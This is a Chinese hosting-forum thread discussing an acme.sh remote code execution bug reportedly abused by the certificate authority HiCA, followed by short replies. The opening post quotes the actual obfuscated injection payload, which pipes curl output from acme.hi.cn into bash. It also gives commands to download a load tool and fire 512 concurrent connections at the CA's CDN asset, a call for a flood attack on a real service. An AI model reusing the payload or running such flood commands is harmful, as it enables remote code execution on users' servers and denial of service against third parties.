全球主机交流论坛

标题: 剑皇 - acme.sh远程代码执行 [打印本页]
作者: gzchenjz    时间: 2023-6-9 20:10
标题: 剑皇 - acme.sh远程代码执行
acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
https://github.com/acmesh-official/acme.sh/issues/4659

{
    Type: http-01
    URL: ../pki-validation
    Status: pending
    Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#
    KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw
}

相关讨论:
https://www.v2ex.com/t/947389
https://推特.com/mholt6/status/1666920303279349760
关于 HiCA:https://www.v2ex.com/t/868344

官网和acme.hi.cn用的阿里云WAF(已关闭),支付链接是腾讯云CDN:



wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64
chmod 755 webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 512 -s https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
作者: caddy    时间: 2023-6-9 20:17
国产CA又立功了
作者: abc.xyz    时间: 2023-6-9 20:28
acme.sh 最近手动命令,现在默认好像是 ZeroSSL?
HiCA 是什么鬼,没听过说。。。
作者: Ryen    时间: 2023-6-10 21:05
前几天才搞完泛域名  。。
作者: elgt    时间: 2023-6-12 08:46
本帖最后由 elgt 于 2023-6-12 08:49 编辑


有人急了
作者: justfkqq    时间: 2023-6-12 08:56
https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了?
作者: mhsl    时间: 2023-6-12 09:15
所以大概是啥意思,有大佬翻译一下没
作者: royzheng    时间: 2023-6-12 09:21
mhsl 发表于 2023-6-12 09:15
所以大概是啥意思,有大佬翻译一下没

就是利用acme.sh脚本权限漏洞,加点料,给申请ssl加入付款收费环节
作者: 莆田郑少斌    时间: 2023-6-12 09:23
elgt 发表于 2023-6-12 08:46
有人急了

它越急,越不能停
作者: elgt    时间: 2023-6-12 09:28
justfkqq 发表于 2023-6-12 08:56
https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了?

没有,应该是停用了
作者: 帝玺SSL    时间: 2023-6-12 23:53
elgt 发表于 2023-6-12 08:46
有人急了

没错,你爹急了
作者: neu9948    时间: 2023-6-28 10:43
royzheng 发表于 2023-6-12 09:21
就是利用acme.sh脚本权限漏洞,加点料,给申请ssl加入付款收费环节

其实也没啥吧,只要不选ECC就不用付费了,半年的泛域名证书多香
作者: ramonde    时间: 2023-6-28 22:50
neu9948 发表于 2023-6-28 10:43
其实也没啥吧,只要不选ECC就不用付费了,半年的泛域名证书多香

对,话说这家的渠道是哪里,现在全网没有半年的了,no那家就算了,根证书30年



欢迎光临 全球主机交流论坛 (https://91ai.net/) Powered by Discuz! X3.4